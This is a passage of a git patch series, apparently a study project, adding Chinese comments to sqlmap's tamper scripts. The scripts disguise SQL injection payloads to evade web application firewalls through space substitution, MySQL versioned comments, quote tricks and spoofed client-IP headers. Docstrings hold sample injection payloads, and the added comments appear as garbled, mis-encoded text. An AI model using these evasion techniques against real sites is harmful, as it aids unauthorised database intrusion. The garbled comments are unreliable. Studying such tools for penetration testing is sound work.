'34=&Xe=&90=&Ni=&rW=&lc=&te=&T4=&zO=&NY=&B4=&hM=&X2=&pU=&D8=&hm=&p0=&7y=&18=&RK=&Xi=&5M=&vM=&hO=&bg=&5c=&b8=&dE=&7I=&5I=&90=&R2=&BK=&bY=&p4=&lu=&po=&Vq=&bY=&3c=&ps=&Xu=&lK=&3Q=&7s=&pq=&1E=&rM=&FG=&vG=&Xy=&tQ=&lm=&rO=&pO=&rO=&1M=&vy=&La=&xW=&f8=&du=&94=&vE=&9q=&bE=&lQ=&JS=&NQ=&fE=&RO=&FI=&zm=&5A=&lE=&DK=&x8=&RQ=&Xw=&LY=&5S=&zi=&Js=&la=&3I=&r8=&re=&Xe=&5A=&3w=&vs=&zQ=&1Q=&HW=&Bw=&Xk=&LU=&Lk=&1E=&Nw=&pm=&ns=&zO=&xq=&7k=&v4=&F6=&Pi=&vo=&zY=&vk=&3w=&tU=&nW=&TG=&NM=&9U=&p4=&9A=&T8=&Xu=&xa=&Jk=&nq=&La=&lo=&zW=&xS=&v0=&Z4=&vi=&Pu=&jK=&DE=&72=&fU=&DW=&1g=&RU=&Hi=&li=&R8=&dC=&nI=&9A=&tq=&1w=&7u=&rg=&pa=&7c=&zk=&rO=&xy=&ZA=&1K=&ha=&tE=&RC=&3m=&r2=&Vc=&B6=&9A=&Pk=&Pi=&zy=&lI=&pu=&re=&vS=&zk=&RE=&xS=&Fs=&x8=&Fe=&rk=&Fi=&Tm=&fA=&Zu=&DS=&No=&lm=&lu=&li=&jC=&Do=&Tw=&xo=&zQ=&nO=&ng=&nC=&PS=&fU=&Lc=&Za=&Ta=&1y=&lw=&pA=&ZW=&nw=&pM=&pa=&Rk=&lE=&5c=&T4=&Vs=&7W=&Jm=&xG=&nC=&Js=&xM=&Rg=&zC=&Dq=&VA=&Vy=&9o=&7o=&Fk=&Ta=&Fq=&9y=&vq=&rW=&X4=&1W=&hI=&nA=&hs=&He=&No=&vy=&9C=&ZU=&t6=&1U=&1Q=&Do=&bk=&7G=&nA=&VE=&F0=&BO=&l2=&BO=&7o=&zq=&B4=&fA=&lI=&Xy=&Ji=&lk=&7M=&JG=&Be=&ts=&36=&tW=&fG=&T4=&vM=&hG=&tO=&VO=&9m=&Rm=&LA=&5K=&FY=&HW=&7Q=&t0=&3I=&Du=&Xc=&BS=&N0=&x4=&fq=&jI=&Ze=&TQ=&5i=&T2=&FQ=&VI=&Te=&Hq=&fw=&LI=&Xq=&LC=&B0=&h6=&TY=&HG=&Hw=&dK=&ru=&3k=&JQ=&5g=&9s=&HQ=&vY=&1S=&ta=&bq=&1u=&9i=&DM=&DA=&TG=&vQ=&Nu=&RK=&da=&56=&nm=&vE=&Fg=&jY=&t0=&DG=&9o=&PE=&da=&D4=&VE=&po=&nm=&lW=&X0=&BY=&NK=&pY=&5Q=&jw=&r0=&FM=&lU=&da=&ls=&Lg=&D8=&B8=&FW=&3M=&zy=&ho=&Dc=&HW=&7E=&bM=&Re=&jk=&Xe=&JC=&vs=&Ny=&D4=&fA=&DM=&1o=&9w=&3C=&Rw=&Vc=&Ro=&PK=&rw=&Re=&54=&xK=&VK=&1O=&1U=&vg=&Ls=&xq=&NA=&zU=&di=&BS=&pK=&bW=&Vq=&BC=&l6=&34=&PE=&JG=&TA=&NU=&hi=&T0=&Rs=&fw=&FQ=&NQ=&Dq=&Dm=&1w=&PC=&j2=&r6=&re=&t2=&Ry=&h2=&9m=&nw=&X4=&vI=&rY=&1K=&7m=&7g=&J8=&Pm=&RO=&7A=&fO=&1w=&1g=&7U=&7Y=&hQ=&FC=&vu=&Lw=&5I=&t0=&Na=&vk=&Te=&5S=&ZM=&Xs=&Vg=&tE=&J2=&Ts=&Dm=&Ry=&FC=&7i=&h8=&3y=&zk=&5G=&NC=&Pq=&ds=&zK=&d8=&zU=&1a=&d8=&Js=&nk=&TQ=&tC=&n8=&Hc=&Ru=&H0=&Bo=&XE=&Jm=&xK=&r2=&Fu=&FO=&NO=&7g=&PC=&Bq=&3O=&FQ=&1o=&5G=&zS=&Ps=&j0=&b0=&RM=&DQ=&RQ=&zY=&nk=&1 AND 2>1' """ - hints = kwargs.get("hints", {}) - delimiter = kwargs.get("delimiter", DEFAULT_GET_POST_DELIMITER) + hints = kwargs.get("hints", {}) # 浠巏wargs涓幏鍙杊ints瀛楀吀锛岃嫢涓嶅瓨鍦ㄥ垯鍒濆鍖栦负绌哄瓧鍏 + delimiter = kwargs.get("delimiter", DEFAULT_GET_POST_DELIMITER) # 浠巏wargs涓幏鍙杁elimiter锛岃嫢涓嶅瓨鍦ㄥ垯浣跨敤榛樿鐨凣ET/POST鍙傛暟鍒嗛殧绗 + +# 鐢熸垚澶ч噺闅忔満鍙傛暟骞舵坊鍔犲埌hints[HINT.PREPEND]涓紝鐢ㄤ簬缁曡繃WAF hints[HINT.PREPEND] = delimiter.join("%s=" % "".join(random.sample(string.ascii_letters + string.digits, 2)) for _ in xrange(500)) diff --git a/src/sqlmap-master/tamper/space2plus.py b/src/sqlmap-master/tamper/space2plus.py index 45110ae..88a338d 100644 --- a/src/sqlmap-master/tamper/space2plus.py +++ b/src/sqlmap-master/tamper/space2plus.py @@ -5,11 +5,14 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ +# 瀵煎叆xrange鍜孭RIORITY from lib.core.compat import xrange from lib.core.enums import PRIORITY +# 瀹氫箟浼樺厛绾т负LOW __priority__ = PRIORITY.LOW +# 瀹氫箟渚濊禆鍑芥暟 def dependencies(): pass @@ -27,27 +30,35 @@ def tamper(payload, **kwargs): retVal = payload + # 濡傛灉payload涓嶄负绌 if payload: retVal = "" quote, doublequote, firstspace = False, False, False + # 閬嶅巻payload鐨勬瘡涓瓧绗 for i in xrange(len(payload)): + # 濡傛灉绗竴涓瓧绗︿笉鏄┖鏍 if not firstspace: + # 濡傛灉褰撳墠瀛楃鏄┖鏍 if payload[i].isspace(): firstspace = True retVal += "+" continue + # 濡傛灉褰撳墠瀛楃鏄崟寮曞彿 elif payload[i] == '\'': quote = not quote + # 濡傛灉褰撳墠瀛楃鏄弻寮曞彿 elif payload[i] == '"': doublequote = not doublequote + # 濡傛灉褰撳墠瀛楃鏄┖鏍硷紝骞朵笖涓嶅湪鍙屽紩鍙峰拰鍗曞紩鍙蜂腑 elif payload[i] == " " and not doublequote and not quote: retVal += "+" continue + # 灏嗗綋鍓嶅瓧绗︽坊鍔犲埌retVal涓 retVal += payload[i] return retVal diff --git a/src/sqlmap-master/tamper/space2randomblank.py b/src/sqlmap-master/tamper/space2randomblank.py index 2a2cc4d..cac06ad 100644 --- a/src/sqlmap-master/tamper/space2randomblank.py +++ b/src/sqlmap-master/tamper/space2randomblank.py @@ -38,30 +38,50 @@ def tamper(payload, **kwargs): # LF 0A new line # FF 0C new page # CR 0D carriage return + # 瀹氫箟涓涓寘鍚壒娈婂瓧绗︾殑鍒楄〃 blanks = ("%09", "%0A", "%0C", "%0D") + # 灏唒ayload璧嬪肩粰retVal retVal = payload + # 濡傛灉payload涓嶄负绌 if payload: + # 灏唕etVal缃负绌哄瓧绗︿覆 retVal = "" + # 瀹氫箟涓変釜甯冨皵鍙橀噺锛屽垎鍒〃绀烘槸鍚﹀湪寮曞彿鍐呫佸弻寮曞彿鍐呭拰绗竴涓┖鏍 quote, doublequote, firstspace = False, False, False + # 閬嶅巻payload鐨勬瘡涓瓧绗 for i in xrange(len(payload)): + # 濡傛灉绗竴涓瓧绗︿笉鏄┖鏍 if not firstspace: + # 濡傛灉褰撳墠瀛楃鏄┖鏍 if payload[i].isspace(): + # 灏唂irstspace缃负True firstspace = True + # 鍦╮etVal涓坊鍔犱竴涓殢鏈洪夋嫨鐨勭壒娈婂瓧绗 retVal += random.choice(blanks) + # 缁х画涓嬩竴娆″惊鐜 continue + # 濡傛灉褰撳墠瀛楃鏄崟寮曞彿 elif payload[i] == '\'': + # 灏唓uote鍙栧弽 quote = not quote + # 濡傛灉褰撳墠瀛楃鏄弻寮曞彿 elif payload[i] == '"': + # 灏哾oublequote鍙栧弽 doublequote = not doublequote + # 濡傛灉褰撳墠瀛楃鏄┖鏍硷紝涓斾笉鍦ㄥ弻寮曞彿鍜屽崟寮曞彿鍐 elif payload[i] == ' ' and not doublequote and not quote: + # 鍦╮etVal涓坊鍔犱竴涓殢鏈洪夋嫨鐨勭壒娈婂瓧绗 retVal += random.choice(blanks) + # 缁х画涓嬩竴娆″惊鐜 continue + # 灏嗗綋鍓嶅瓧绗︽坊鍔犲埌retVal涓 retVal += payload[i] + # 杩斿洖retVal return retVal diff --git a/src/sqlmap-master/tamper/substring2leftright.py b/src/sqlmap-master/tamper/substring2leftright.py index 642e499..d993050 100644 --- a/src/sqlmap-master/tamper/substring2leftright.py +++ b/src/sqlmap-master/tamper/substring2leftright.py @@ -32,16 +32,26 @@ def tamper(payload, **kwargs): retVal = payload + # 濡傛灉payload涓嶄负绌 if payload: + # 鍦╬ayload涓煡鎵維UBSTRING鍑芥暟 match = re.search(r"SUBSTRING\((.+?)\s+FROM[^)]+(\d+)[^)]+FOR[^)]+1\)", payload) + # 濡傛灉鎵惧埌浜哠UBSTRING鍑芥暟 if match: + # 鑾峰彇SUBSTRING鍑芥暟涓殑浣嶇疆鍙傛暟 pos = int(match.group(2)) + # 濡傛灉浣嶇疆鍙傛暟涓1 if pos == 1: + # 灏哠UBSTRING鍑芥暟鏇挎崲涓篖EFT鍑芥暟 _ = "LEFT(%s,1)" % (match.group(1)) + # 鍚﹀垯 else: + # 灏哠UBSTRING鍑芥暟鏇挎崲涓篟IGHT鍜孡EFT鍑芥暟鐨勭粍鍚 _ = "LEFT(RIGHT(%s,%d),1)" % (match.group(1), 1 - pos) + # 灏嗘浛鎹㈠悗鐨勫嚱鏁版浛鎹㈠洖payload涓 retVal = retVal.replace(match.group(0), _) + # 杩斿洖鏇挎崲鍚庣殑payload return retVal diff --git a/src/sqlmap-master/tamper/symboliclogical.py b/src/sqlmap-master/tamper/symboliclogical.py index f33e09c..8cc03e0 100644 --- a/src/sqlmap-master/tamper/symboliclogical.py +++ b/src/sqlmap-master/tamper/symboliclogical.py @@ -5,12 +5,16 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ +# 瀵煎叆姝e垯琛ㄨ揪寮忔ā鍧 import re +# 浠巐ib.core.enums妯″潡涓鍏RIORITY鏋氫妇 from lib.core.enums import PRIORITY +# 瀹氫箟鏈浣庝紭鍏堢骇 __priority__ = PRIORITY.LOWEST +# 瀹氫箟渚濊禆鍑芥暟 def dependencies(): pass @@ -24,6 +28,7 @@ def tamper(payload, **kwargs): retVal = payload + # 濡傛灉payload涓嶄负绌猴紝鍒欏皢payload涓殑AND鏇挎崲涓%26%26锛屽皢OR鏇挎崲涓%7C%7C if payload: retVal = re.sub(r"(?i)\bAND\b", "%26%26", re.sub(r"(?i)\bOR\b", "%7C%7C", payload)) diff --git a/src/sqlmap-master/tamper/unionalltounion.py b/src/sqlmap-master/tamper/unionalltounion.py index 1c1ae21..d56b8a3 100644 --- a/src/sqlmap-master/tamper/unionalltounion.py +++ b/src/sqlmap-master/tamper/unionalltounion.py @@ -7,11 +7,14 @@ See the file 'LICENSE' for copying permission from lib.core.enums import PRIORITY +# 璁剧疆浼樺厛绾т负鏈楂 __priority__ = PRIORITY.HIGHEST +# 瀹氫箟渚濊禆鍑芥暟 def dependencies(): pass +# 瀹氫箟tamper鍑芥暟锛岀敤浜庢浛鎹ayload涓殑UNION ALL SELECT涓篣NION SELECT def tamper(payload, **kwargs): """ Replaces instances of UNION ALL SELECT with UNION SELECT counterpart @@ -20,4 +23,5 @@ def tamper(payload, **kwargs): '-1 UNION SELECT' """ + # 濡傛灉payload瀛樺湪锛屽垯鏇挎崲鍏朵腑鐨刄NION ALL SELECT涓篣NION SELECT return payload.replace("UNION ALL SELECT", "UNION SELECT") if payload else payload diff --git a/src/sqlmap-master/tamper/unmagicquotes.py b/src/sqlmap-master/tamper/unmagicquotes.py index 89e9b96..6e19576 100644 --- a/src/sqlmap-master/tamper/unmagicquotes.py +++ b/src/sqlmap-master/tamper/unmagicquotes.py @@ -31,23 +31,38 @@ def tamper(payload, **kwargs): retVal = payload + # 濡傛灉payload涓嶄负绌 if payload: found = False retVal = "" + # 閬嶅巻payload涓殑姣忎釜瀛楃 for i in xrange(len(payload)): + # 濡傛灉瀛楃涓哄崟寮曞彿涓攆ound涓篎alse if payload[i] == '\'' and not found: + # 灏%bf%27娣诲姞鍒皉etVal涓 retVal += "%bf%27" + # 灏唂ound璁剧疆涓篢rue found = True else: + # 灏嗗瓧绗︽坊鍔犲埌retVal涓 retVal += payload[i] + # 缁х画寰幆 continue + # 濡傛灉found涓篢rue if found: + # 浣跨敤姝e垯琛ㄨ揪寮忔浛鎹etVal涓殑鍐呭 _ = re.sub(r"(?i)\s*(AND|OR)[\s(]+([^\s]+)\s*(=|LIKE)\s*\2", "", retVal) + # 濡傛灉鏇挎崲鍚庣殑鍐呭涓巖etVal涓嶅悓 if _ != retVal: + # 灏嗘浛鎹㈠悗鐨勫唴瀹硅祴鍊肩粰retVal retVal = _ + # 灏-- -娣诲姞鍒皉etVal涓 retVal += "-- -" + # 濡傛灉retVal涓笉鍖呭惈#銆--銆/*涓殑浠绘剰涓涓 elif not any(_ in retVal for _ in ('#', '--', '/*')): + # 灏-- -娣诲姞鍒皉etVal涓 retVal += "-- -" + # 杩斿洖retVal return retVal diff --git a/src/sqlmap-master/tamper/uppercase.py b/src/sqlmap-master/tamper/uppercase.py index ad27404..5e223bc 100644 --- a/src/sqlmap-master/tamper/uppercase.py +++ b/src/sqlmap-master/tamper/uppercase.py @@ -36,11 +36,17 @@ def tamper(payload, **kwargs): retVal = payload + # 濡傛灉payload涓嶄负绌 if payload: + # 鍦╮etVal涓煡鎵炬墍鏈夊尮閰峓A-Za-z_]鐨勬鍒欒〃杈惧紡 for match in re.finditer(r"[A-Za-z_]+", retVal): + # 鑾峰彇鍖归厤鐨勫崟璇 word = match.group() + # 濡傛灉鍗曡瘝鐨勫ぇ鍐欏舰寮忓湪kb.keywords涓 if word.upper() in kb.keywords: + # 灏唕etVal涓殑鍗曡瘝鏇挎崲涓哄ぇ鍐欏舰寮 retVal = retVal.replace(word, word.upper()) + # 杩斿洖retVal return retVal diff --git a/src/sqlmap-master/tamper/varnish.py b/src/sqlmap-master/tamper/varnish.py index 0e0add6..a0e8cae 100644 --- a/src/sqlmap-master/tamper/varnish.py +++ b/src/sqlmap-master/tamper/varnish.py @@ -28,6 +28,9 @@ def tamper(payload, **kwargs): >> X-remote-IP: * or %00 or %0A """ + # 鑾峰彇kwargs瀛楀吀涓殑headers閿搴旂殑鍊硷紝濡傛灉涓嶅瓨鍦ㄥ垯杩斿洖绌哄瓧鍏 headers = kwargs.get("headers", {}) + # 鍦╤eaders瀛楀吀涓坊鍔燲-originating-IP閿紝鍊间负127.0.0.1 headers["X-originating-IP"] = "127.0.0.1" + # 杩斿洖payload return payload diff --git a/src/sqlmap-master/tamper/versionedkeywords.py b/src/sqlmap-master/tamper/versionedkeywords.py index 6914ade..6a8781b 100644 --- a/src/sqlmap-master/tamper/versionedkeywords.py +++ b/src/sqlmap-master/tamper/versionedkeywords.py @@ -36,17 +36,26 @@ def tamper(payload, **kwargs): '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#' """ + # 瀹氫箟涓涓嚱鏁帮紝鐢ㄤ簬澶勭悊鍖归厤鍒扮殑鍗曡瘝 def process(match): + # 鑾峰彇鍖归厤鍒扮殑鍗曡瘝 word = match.group('word') + # 濡傛灉鍗曡瘝鐨勫ぇ鍐欏舰寮忓湪鍏抽敭璇嶅垪琛ㄤ腑 if word.upper() in kb.keywords: + # 灏嗗尮閰嶅埌鐨勫崟璇嶆浛鎹负/*!鍗曡瘝*/ return match.group().replace(word, "/*!%s*/" % word) else: + # 鍚﹀垯锛岃繑鍥炲尮閰嶅埌鐨勫崟璇 return match.group() + # 灏唒ayload璧嬪肩粰retVal retVal = payload + # 濡傛灉payload涓嶄负绌 if payload: + # 浣跨敤姝e垯琛ㄨ揪寮忓尮閰嶅崟璇嶏紝骞惰皟鐢╬rocess鍑芥暟杩涜澶勭悊 retVal = re.sub(r"(?<=\W)(?P[A-Za-z_]+)(?=[^\w(]|\Z)", process, retVal) + # 灏" /*!"鏇挎崲涓"/*!"锛屽皢"*/ "鏇挎崲涓"*/" retVal = retVal.replace(" /*!", "/*!").replace("*/ ", "*/") return retVal diff --git a/src/sqlmap-master/tamper/versionedmorekeywords.py b/src/sqlmap-master/tamper/versionedmorekeywords.py index fe3480e..b160406 100644 --- a/src/sqlmap-master/tamper/versionedmorekeywords.py +++ b/src/sqlmap-master/tamper/versionedmorekeywords.py @@ -37,17 +37,27 @@ def tamper(payload, **kwargs): '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#' """ + # 瀹氫箟涓涓嚱鏁帮紝鐢ㄤ簬澶勭悊鍖归厤鍒扮殑鍗曡瘝 def process(match): + # 鑾峰彇鍖归厤鍒扮殑鍗曡瘝 word = match.group('word') + # 濡傛灉鍗曡瘝鐨勫ぇ鍐欏舰寮忓湪鍏抽敭璇嶅垪琛ㄤ腑锛屽苟涓斾笉鍦ㄥ拷鐣ョ┖鏍煎奖鍝嶇殑鍏抽敭璇嶅垪琛ㄤ腑 if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS: + # 灏嗗尮閰嶅埌鐨勫崟璇嶆浛鎹负/*!鍗曡瘝*/ return match.group().replace(word, "/*!%s*/" % word) else: + # 鍚﹀垯锛岃繑鍥炲尮閰嶅埌鐨勫崟璇 return match.group() + # 灏唒ayload璧嬪肩粰retVal retVal = payload + # 濡傛灉payload涓嶄负绌 if payload: + # 浣跨敤姝e垯琛ㄨ揪寮忓尮閰嶅崟璇嶏紝骞惰皟鐢╬rocess鍑芥暟杩涜澶勭悊 retVal = re.sub(r"(?<=\W)(?P[A-Za-z_]+)(?=\W|\Z)", process, retVal) + # 灏" /*!"鏇挎崲涓"/*!"锛屽皢"*/ "鏇挎崲涓"*/" retVal = retVal.replace(" /*!", "/*!").replace("*/ ", "*/") + # 杩斿洖retVal return retVal diff --git a/src/sqlmap-master/tamper/xforwardedfor.py b/src/sqlmap-master/tamper/xforwardedfor.py index b1d2892..a222dbc 100644 --- a/src/sqlmap-master/tamper/xforwardedfor.py +++ b/src/sqlmap-master/tamper/xforwardedfor.py @@ -16,11 +16,16 @@ def dependencies(): pass def randomIP(): + """ + 鐢熸垚涓涓殢鏈虹殑IP鍦板潃 + """ octets = [] + # 鐢熸垚涓涓殢鏈虹殑IP鍦板潃锛屾帓闄10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16杩欎笁涓鏈塈P鍦板潃娈 while not octets or octets[0] in (10, 172, 192): octets = random.sample(xrange(1, 255), 4) + # 灏嗙敓鎴愮殑IP鍦板潃娈佃繛鎺ユ垚涓涓瓧绗︿覆 return '.'.join(str(_) for _ in octets) def tamper(payload, **kwargs): @@ -28,7 +33,9 @@ def tamper(payload, **kwargs): Append a fake HTTP header 'X-Forwarded-For' (and alike) """ + # 鑾峰彇浼犲叆鐨刪eaders鍙傛暟锛屽鏋滄病鏈夊垯鍒涘缓涓涓┖瀛楀吀 headers = kwargs.get("headers", {}) + # 鐢熸垚涓涓殢鏈虹殑IP鍦板潃锛屽苟灏嗗叾娣诲姞鍒癶eaders涓 headers["X-Forwarded-For"] = randomIP() headers["X-Client-Ip"] = randomIP() headers["X-Real-Ip"] = randomIP() @@ -36,9 +43,12 @@ def tamper(payload, **kwargs): headers["True-Client-IP"] = randomIP() # Reference: https://developer.chrome.com/multidevice/data-compression-for-isps#proxy-connection + # 娣诲姞涓涓猇ia澶达紝琛ㄧず閫氳繃Chrome Compression Proxy浠g悊 headers["Via"] = "1.1 Chrome-Compression-Proxy" # Reference: https://wordpress.org/support/topic/blocked-country-gaining-access-via-cloudflare/#post-9812007 + # 娣诲姞涓涓狢F-IPCountry澶达紝琛ㄧず閫氳繃Cloudflare浠g悊锛屽苟闅忔満閫夋嫨涓涓浗瀹 headers["CF-IPCountry"] = random.sample(('GB', 'US', 'FR', 'AU', 'CA', 'NZ', 'BE', 'DK', 'FI', 'IE', 'AT', 'IT', 'LU', 'NL', 'NO', 'PT', 'SE', 'ES', 'CH'), 1)[0] + # 杩斿洖娣诲姞浜唄eaders鐨刾ayload return payload From 2f377ec379bdec1a56fb80a5fe01036d726e6465 Mon Sep 17 00:00:00 2001 From: sck <2238502556@qq.com> Date: Mon, 30 Dec 2024 10:27:51 +0800 Subject: [PATCH 8/9] sck --- src/sqlmap-master/tamper/misunion.py | 7 ++++++- .../tamper/modsecurityversioned.py | 10 ++++++++++ .../tamper/modsecurityzeroversioned.py | 9 +++++++++ src/sqlmap-master/tamper/multiplespaces.py | 11 ++++++++-- src/sqlmap-master/tamper/ord2ascii.py | 2 ++ src/sqlmap-master/tamper/overlongutf8.py | 5 +++++ src/sqlmap-master/tamper/overlongutf8more.py | 3 +++ src/sqlmap-master/tamper/percentage.py | 4 ++++ src/sqlmap-master/tamper/plus2concat.py | 9 ++++++++- src/sqlmap-master/tamper/plus2fnconcat.py | 10 ++++++++-- src/sqlmap-master/tamper/randomcase.py | 10 +++++++--- src/sqlmap-master/tamper/space2morehash.py | 13 ++++++++++++ src/sqlmap-master/tamper/space2mssqlblank.py | 16 +++++++++++++++ src/sqlmap-master/tamper/space2mssqlhash.py | 10 ++++++++++ src/sqlmap-master/tamper/space2mysqlblank.py | 20 +++++++++++++++++++ src/sqlmap-master/tamper/space2mysqldash.py | 16 +++++++++++++++ 16 files changed, 146 insertions(+), 9 deletions(-) diff --git a/src/sqlmap-master/tamper/misunion.py b/src/sqlmap-master/tamper/misunion.py index 596880a..c852b82 100644 --- a/src/sqlmap-master/tamper/misunion.py +++ b/src/sqlmap-master/tamper/misunion.py @@ -8,12 +8,14 @@ See the file 'LICENSE' for copying permission import os import re +# 浠巗qlmap鐨勫簱涓鍏ヤ竴浜涙灇涓惧拰鍑芥暟 from lib.core.common import singleTimeWarnMessage from lib.core.enums import DBMS from lib.core.enums import PRIORITY __priority__ = PRIORITY.HIGHEST +# 瀹氫箟dependencies鍑芥暟锛岀敤浜庡湪杩愯tamper鑴氭湰鏃舵樉绀鸿鍛婁俊鎭 def dependencies(): singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) @@ -32,5 +34,8 @@ def tamper(payload, **kwargs): >>> tamper('1" UNION ALL SELECT') '1"-.1UNION ALL SELECT' """ - + # 浣跨敤姝e垯琛ㄨ揪寮忔浛鎹ayload涓殑UNION鍏抽敭瀛楋紝鍓嶉潰鍔犱笂-.1 + # 杩欐牱鍋氭槸涓轰簡缁曡繃鏌愪簺WAF锛圵eb Application Firewall锛夌殑妫娴 + # 姝e垯琛ㄨ揪寮(?i)\s+(UNION )鍖归厤UNION鍏抽敭瀛楋紝骞朵笖蹇界暐澶у皬鍐 + # \g<1>鏄弽鍚戝紩鐢紝琛ㄧず鏇挎崲鏃朵繚鐣欏尮閰嶅埌鐨刄NION鍏抽敭瀛 return re.sub(r"(?i)\s+(UNION )", r"-.1\g<1>", payload) if payload else payload diff --git a/src/sqlmap-master/tamper/modsecurityversioned.py b/src/sqlmap-master/tamper/modsecurityversioned.py index 19c1d08..66ab070 100644 --- a/src/sqlmap-master/tamper/modsecurityversioned.py +++ b/src/sqlmap-master/tamper/modsecurityversioned.py @@ -7,16 +7,22 @@ See the file 'LICENSE' for copying permission import os +# 浠巗qlmap鐨勫簱涓鍏ラ殢鏈烘暟鐢熸垚鍑芥暟鍜屽崟娆¤鍛婃秷鎭嚱鏁 from lib.core.common import randomInt from lib.core.common import singleTimeWarnMessage +# 瀵煎叆鏁版嵁搴撶鐞嗙郴缁熸灇涓惧拰浼樺厛绾ф灇涓 from lib.core.enums import DBMS from lib.core.enums import PRIORITY +# 璁剧疆杩欎釜tamper鑴氭湰鐨勪紭鍏堢骇 __priority__ = PRIORITY.HIGHER +# 瀹氫箟dependencies鍑芥暟锛岀敤浜庡湪杩愯tamper鑴氭湰鏃舵樉绀鸿鍛婁俊鎭 def dependencies(): + # 鏄剧ず鍗曟璀﹀憡娑堟伅锛屽憡鐭ョ敤鎴疯繖涓猼amper鑴氭湰鍙拡瀵筂ySQL鏁版嵁搴 singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) +# 瀹氫箟tamper鍑芥暟锛岃繖鏄剼鏈殑涓昏鍔熻兘鍑芥暟锛岀敤浜庝慨鏀筽ayload def tamper(payload, **kwargs): """ Embraces complete query with (MySQL) versioned comment @@ -38,14 +44,18 @@ def tamper(payload, **kwargs): retVal = payload + # 濡傛灉payload涓嶄负绌 if payload: postfix = '' + # 閬嶅巻鍙兘鐨勬敞閲婄鍙凤紝鎵惧埌payload涓殑绗竴涓敞閲婄鍙 for comment in ('#', '--', '/*'): if comment in payload: postfix = payload[payload.find(comment):] payload = payload[:payload.find(comment)] break + # 濡傛灉payload涓寘鍚┖鏍硷紝璇存槑鍙互鎻掑叆versioned comment if ' ' in payload: + # 鏋勯犳柊鐨刾ayload锛屾彃鍏ersioned comment retVal = "%s /*!30%s%s*/%s" % (payload[:payload.find(' ')], randomInt(3), payload[payload.find(' ') + 1:], postfix) return retVal diff --git a/src/sqlmap-master/tamper/modsecurityzeroversioned.py b/src/sqlmap-master/tamper/modsecurityzeroversioned.py index c646d1a..f83fb10 100644 --- a/src/sqlmap-master/tamper/modsecurityzeroversioned.py +++ b/src/sqlmap-master/tamper/modsecurityzeroversioned.py @@ -7,15 +7,21 @@ See the file 'LICENSE' for copying permission import os +# 浠巗qlmap鐨勫簱涓鍏ュ崟娆¤鍛婃秷鎭嚱鏁 from lib.core.common import singleTimeWarnMessage +# 瀵煎叆鏁版嵁搴撶鐞嗙郴缁熸灇涓惧拰浼樺厛绾ф灇涓 from lib.core.enums import DBMS from lib.core.enums import PRIORITY +# 璁剧疆杩欎釜tamper鑴氭湰鐨勪紭鍏堢骇 __priority__ = PRIORITY.HIGHER +# 瀹氫箟dependencies鍑芥暟锛岀敤浜庡湪杩愯tamper鑴氭湰鏃舵樉绀鸿鍛婁俊鎭 def dependencies(): + # 鏄剧ず鍗曟璀﹀憡娑堟伅锛屽憡鐭ョ敤鎴疯繖涓猼amper鑴氭湰鍙拡瀵筂ySQL鏁版嵁搴 singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) +# 瀹氫箟tamper鍑芥暟锛岃繖鏄剼鏈殑涓昏鍔熻兘鍑芥暟锛岀敤浜庝慨鏀筽ayload def tamper(payload, **kwargs): """ Embraces complete query with (MySQL) zero-versioned comment @@ -37,12 +43,15 @@ def tamper(payload, **kwargs): if payload: postfix = '' + # 閬嶅巻鍙兘鐨勬敞閲婄鍙凤紝鎵惧埌payload涓殑绗竴涓敞閲婄鍙 for comment in ('#', '--', '/*'): if comment in payload: postfix = payload[payload.find(comment):] payload = payload[:payload.find(comment)] break + # 濡傛灉payload涓寘鍚┖鏍硷紝璇存槑鍙互鎻掑叆zero-versioned comment if ' ' in payload: + # 鏋勯犳柊鐨刾ayload锛屾彃鍏ero-versioned comment retVal = "%s /*!00000%s*/%s" % (payload[:payload.find(' ')], payload[payload.find(' ') + 1:], postfix) return retVal diff --git a/src/sqlmap-master/tamper/multiplespaces.py b/src/sqlmap-master/tamper/multiplespaces.py index 8f2ae17..6e26a9b 100644 --- a/src/sqlmap-master/tamper/multiplespaces.py +++ b/src/sqlmap-master/tamper/multiplespaces.py @@ -8,6 +8,7 @@ See the file 'LICENSE' for copying permission import random import re +# 浠巗qlmap鐨勫簱涓鍏ョ煡璇嗗簱鍜屾暟鎹被鍨 from lib.core.data import kb from lib.core.datatype import OrderedSet from lib.core.enums import PRIORITY @@ -35,16 +36,22 @@ def tamper(payload, **kwargs): retVal = payload if payload: + # 浣跨敤OrderedSet瀛樺偍鎵惧埌鐨凷QL鍏抽敭瀛楋紝纭繚鍏抽敭瀛楃殑鍞竴鎬 words = OrderedSet() + # 浣跨敤姝e垯琛ㄨ揪寮忔壘鍒皃ayload涓殑鎵鏈夊崟璇嶏紙SQL鍏抽敭瀛楋級 for match in re.finditer(r"\b[A-Za-z_]+\b", payload): word = match.group() - + # 濡傛灉鍗曡瘝鏄疭QL鍏抽敭瀛楋紝鍒欐坊鍔犲埌OrderedSet涓 if word.upper() in kb.keywords: words.add(word) - + # 瀵逛簬OrderedSet涓殑姣忎釜SQL鍏抽敭瀛 for word in words: + # 鍦ㄥ叧閿瓧鍓嶅悗娣诲姞1鍒4涓殢鏈烘暟閲忕殑绌烘牸 + # (?<=\W)纭繚鎴戜滑鍦ㄩ潪鍗曡瘝瀛楃鍚庢浛鎹 + # (?=[^A-Za-z_(]|\Z)纭繚鎴戜滑鍦ㄩ潪鍗曡瘝瀛楃鍓嶆浛鎹㈡垨瀛楃涓叉湯灏 retVal = re.sub(r"(?<=\W)%s(?=[^A-Za-z_(]|\Z)" % word, "%s%s%s" % (' ' * 